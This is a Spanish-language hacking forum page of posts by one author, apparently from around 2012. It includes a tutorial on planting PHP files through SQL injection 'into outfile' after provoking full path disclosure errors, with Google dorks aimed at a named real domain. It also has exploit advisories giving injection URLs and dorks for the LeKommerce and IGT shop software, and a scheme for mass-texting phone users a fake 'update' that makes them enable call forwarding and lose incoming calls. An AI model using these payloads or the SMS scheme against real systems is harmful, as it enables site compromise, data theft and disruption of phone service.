La informacion adicional necesaria para realizar el metodo de upload mysql  es la ruta raiz o DocumentRoot, que es la ruta desde la cual se es montado toda la estructura del sitio web segun la configuracion de su ADMIN. Esta es necesaria para poder subir archivos y dejarlos ejecutando en el servidor para el beneficio que requiera.

Ejemplo:

   
Código: php
http://servidor/path1/archivo.php?sqli=-241 union all select 1,2,3,4,[CODEASUBIR],6,7,8,9 into outfile
    "/home/usuario/web1/htdocs/path1/archivomalicioso.php"

Resultado:

Código: php
    http://servidor/path1/archivomalicioso.php



Si no sabemos esa ruta, no podriamos subir un archivo debido a que no estamos definiendo en donde sera su destino.


-------------------------------------------------------------------------------------

Directory Transversal
Esta vulnerabilidad se basa principalmente en obtencion archivos mediante rutas, aunque se puede explotar a ciegas jugando un poco al "reverse" [../../../] de directorios, pero si esta vulnerabilidad la apoyamos con un "error informativo" que nos de la Full Path Disclosure?... Seria mucho mas facil, incluso seria un poco mas peligroso y explicito, ya que podria navegar de raiz a rama [Metaforicamente]

Los errores que nos pueden ayudar son del tipo:



Pero la pregunta de todos seria... como logro saber la ruta completa?

Dependiendo del escenario armaremos el rompecabezas. Muchas veces al encontrar SQLI, el error impreso o generado tiende a ser un "Error informativo"; Ya que nos muestra FPD (Full path disclosure) entre otros datos que nos podrian servir para mas adelante.


Sin embargo no siemrpe es asi y hay es donde nos toca apoyarnos de otras fallas para lograr realizar el objetivo.


Este tipo de errores informativos los podemos localizar mediante google o algun crawler de preferencia, listando los archivos PHP del servidor indexados y ver sus errores.


Usando Dork basica:


Código: php
site:sitio.com ext:php



Ejemplo:

Código: php
      site:mensajito.tigo.com.co ext:php




Listo ya obtuvimos la path: /var/www/html/includes/common.inc.php
La explotacion seria masomenos asi:

Ejemplo:

   
Código: php
http://servidor/path1/archivo.php?sqli=-241 union all select 1,2,3,4,[CODEASUBIR],6,7,8,9 into outfile
    "/var/www/html/includes/archivomalicioso.php"

Resultado:

Código: php
        http://servidor/includes/archivomalicioso.php



NOTA: Tiende a ser necesario el Encode Base_64

Podemos enfrentarnos a un servidor mas seguro por lo tanto no indexa archivos php vuln y nos tocaria generarlos por nuestra propia cuenta.

La habitual forma para generar un full path disclosure seria jugar con las variables.
Tenemos un archivo que descarga los pdfs de la web mediante la variable ruta, la cual asigna donde se encuentran los PDF

Ejemplo:

Código: php
    www.sitio.com/descarga.php?ruta=/pdf/1.pdf



Rotundamente se descargara el pdf de forma bonita y sin ningun problema...Pero que pasa si ponemos una ruta invalida?

Ejemplo:
Código: php

    www.sitio.com/documentos/descarga.php?ruta=31337
    www.sitio.com/documentos/descarga.php?ruta=
    www.sitio.com/documentos/descarga.php?ruta[]=



Resultado:

Código: php
Warning: fopen(31337) [function.fopen]: failed to open stream: No such file or directory in /var/www/html/documentos/descarga.php on line 9


NOTA: En ciertos casos no se generan errores con caracteres o rutas invalidas, por eso hay que probar sin poner nada: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Magicamento obtenemos ese lindo error el cual nos ayuda a proceder en la ayuda de otras vulnerabilidades.


Bueno, tambien podemos obtener y generar errores por cabeceras, de las cuales podemos usar un BLANK o carcater en parametros para ver como responde este.

En este caso utilizaré la muy conocida web del troyano poison-ivy la cual tiene un error al dejar en blank el parametro PHPSESSID= de Cookie.

Código: php
GET http://www.poisonivy-rat.com/index.php?link=download HTTP/1.1
Host: www.poisonivy-rat.com
User-Agent:
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=



Respuesta

Código: php
HTTP/1.1 200 OK
Date: Sat, 30 Jun 2012 09:15:35 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch7 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch7
Content-Length: 7502
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

     



Aqui utilizaré el live HTTP headers (Disculpenme usar WindSucks [Mi PC esta Dañada])




Si enviamos el BLANK obtendremos el siguiente error


Para la visualizacion quitamos las imagenes y bingo!


Nuestro Resultado seria:

Código: php

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/index.php on line 2

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /var/www/index.php:2) in /var/www/index.php on line 2

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /var/www/index.php:2) in /var/www/index.php on line 2


Autor: MaztoR
#15
Bugs y Exploits / Exploit SQLI LeKommerce
Abril 05, 2012, 09:25:16 PM


Código: php
# Author: Mazt0r
# Exploit Title: Online Shop SQLI
# Date: 04 DE MARZO DE 2012
# software: LeKommerce
# link: http://www.lekommerce.com/
# Version: "ESPECIFIC VERSION NO TESTED"
# Category: Commerce online
# Tested on: Linux

D0rk: inurl:secc.php?id=

=====================================
Exploit :
======================
http://localhost/path/secc.php?id={sqli}
======================
Example:
======================
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables--
======================
dbs:
======================
+--------------------------------+
| t_clientes |
| t_colores |
| t_colores_idiomas |
| t_configuracionglobal |
| t_emailing |
| t_emailingcliente |
| t_facturascompra |
| t_facturasventa |
| t_familias |
| t_familias_idiomas |
| t_formaspago |
| t_idiomas |
| t_incidencias |
| t_iva |
| t_marcas |
| t_menusuperior |
| t_noticias |
| t_productos |
| t_productos_idiomas |
| t_proveedores |
| t_provincias |
| t_rel_productos_tallas_colores |
| t_rel_tallas_colores |
| t_seccionesproductos |
| t_seccionesproductos_idiomas |
| t_series |
| t_subfamilias |
| t_subfamilias_idiomas |
| t_tallas |
| t_tallas_idiomas |
| t_tiposperfiles |
| t_traducciones |
| t_usuarios |
+--------------------------------+

PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC!

----------------------------------
PANEL ADMIN: [/lib/validar_index.php]

----------------------------------
Blog: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Twitter: @Mazt0r
----------------------------------



LINKS EXPLOIT REPORTS
-----------------------------------------

OSDVB:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
EXPLOIT DB: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PACKET-STORM:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
SECUNIA: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#16
Código: php
# Author: Mazt0r
# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux



----------------
Vulnerability
----------------

Exploit:
======================

http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]

======================
Example:
======================

http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=

Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3

Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]



----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
======================== Camaradas! DDLR & CL ========================================
Greetz : zer0-zo0rg | Zeux0r | SeguridadBlanca | k4rl | Pum4 | TheLatin | 4t0m1x | Destroyer
-------------------------------------------------------------------------------------
#17
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Y si haces una redireccion a un numero que te cobre? Te podrías ganar algunos miles de dólares. Es algo parecido al típico ataque por Bluetooth que le haces llamar a otro teléfono a un numero que te cobra por llamada

si se puede, pero la verdad fue una prueba superficial, no tocada muy a fondo.
#18
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: php
[quote author=MAZTOR link=topic=6172.msg20476#msg20476 date=1309574286]
Pues En mi Rato Libre Me puse a Realizar una Investigacion en celulares Analogicos y Modernos.... Probando con Cmands Sticks y Me Acorde De algo!


Seguro que te nació la idea  ::) o la encontraste por ahí  :o

Este tema ha sido tratado muchas veces y hace mucho tiempo así que no creas que por haberte acordado los créditos son tuyos  ;)

Char solo muestrame la primera pagina donde se trate esto ;) y la verdad te agradecere ;)
depronto con las peliculas de "HACKERS" que ves!!, crees que ya es tratado pero esto es la realidad no ciencia ficcion.
nunca sobran los Trolls no? afirman sin saber de que se habla...

y como dicen un amigo: " Los que saben hacen lo que pueden, los que no solo critican y buscan que envidiar"
#19


Pues En mi Rato Libre Me puse a Realizar una Investigacion en celulares Analogicos y Modernos.... Probando con Cmands Sticks y Me Acorde De algo!

Se Acuerdan De los 2 Famosos Commands!!!
Código: php

**21*numerodestinatario# [SEND]
*##21# [SEND]



Si no se acuerdan.. estos son DESVIOS DE LLAMADAS

Pero Se preguntaran Porque esta Huevada Se esta Posteando? Es mas Viejo Que mis Cojones!!

Aqui va la Respuesta...

Que tal Si Coges un SPAMMER CEL y Haces Los Siguiente..

Código: php

|--------------------------------------------------------|
| Cel: 301-xxx-xxxx
|      301-xxx-xxxx
|      301-xxx-xxxx
|      301-xxx-xxxx
|      301-xxx-xxxx
|   Con Mas numeros..
|
|Mensaje: Su Operador le informa que hay una Actualizacion
|Para Solicitarla Oprima lo Siguiente: **21*10101010#  seguido
| de
|la tecla Send....
----------------------------------------------------------



NOTA: **21*10101010# Donde se encuentra el Numero 10101010 deberia ir un Desvio con Numero Activo pero si este esta OFF o No existe Crearia un Error De llamada o Numero Errado.

Que Pasaria?

Lo Intente con 5 Numeros Familiares.. y con los Cels a la mano..

al Momento de llamarles, Este No Permitian llamadas entrantes..


GRABACION: NUMERO ERRADO!


Aja y Eso que.. Como Podria Joder a Toda una Ciudad.. Que Tonteria!

Las Bases Con los Numeros Celulares de Ciertos Operadores.. las consigues Por hay... con el objetivo de hacer Marketing, que tal si compramos unas pero sin tal objetivo?

1 Base Tiene Aprox 2 Millones de numeros Que Al Crear un "Spammer cel" con soporte de cierta cantidad, Se podria Saturar Miles y Miles de Lineas Moviles...


Poniendolo A Prueba!


1- Conecte mi cel y Transferi Los Directrios y Grupos Telefonicos a un TXT

2- Cogi el Spammer de un Amigo.. y Enviamos el mensaje a 50 Numeros

3- Al Intentar llamar a alguno de estos



GRABACION: NUMERO ERRADO!




Al testear un rato mas Me doy cuenta.. Que en Todos Los Modelos No sirve este!!
Solo Algunos De ellos!!!

Por eso No es un 100 % COMPROBADO! ya que no tengo Miles de Celulares XD!
Pero si un 90 % Funcional!


CONCLUSION:
Un Operador Movil Podria Quebrar o Decaer Con Este Fallo En Ciertos Celulares Incluso!.. La dificil SOLUCION ya que la manera de Arreglar Seria Enviando un MENSAJE con el Discado Que lo soluciona...


SOLUCION DEL FALLO:
##21# [SEND]

Pocas Palabras...
Este Tipo de Ataques Puede Ser fatal para los Usuarios con celulares Algo Antiguos Incluso Celulares nuevos que admiten la Reprogramacion De Sticks o KeyTicks... Esto Podria Afectar Demasiado a los Locales de Llamadas.. Que Usan Generalmente este tipo de Celulares... GENRARIA UNA GRAN DECAIDA DE $$$...
#20
1-jajaja, Bueno señores, la verdad me parece que si el USUARIO al cual se le fue criticado acato criticas y acepto errores, no se debe meter un tercero.....

2- Si os molesta algo por la critica de XZITE me parece ponerlo en MP, no creo que sea conveniente estar peleando en el foro.. es ESTUPIDO e INMADURO

3-
en este mundo hay distintas personalidades, los que hacen por que saben, los que critican por ayudar a mejorar o empeorar y los que critican a los que critican... por falta de MADUREZ!!

4- Me parece una definicion CLARA la que esta en el diccionario de la lengua española sobre CRITICA e INSULTO... y para nada parecio una critica lo que has hecho: CorruptedByte

5- Si alguien critica a otro usuario.... solo intente CORREGIR no hagan precriticas por pelear.... y si no les agrada un USUARIO simplemente IGNORENLO.. Sabio es el que calla y se es prudente, no el que levanta la voz y se embarra asi mismo.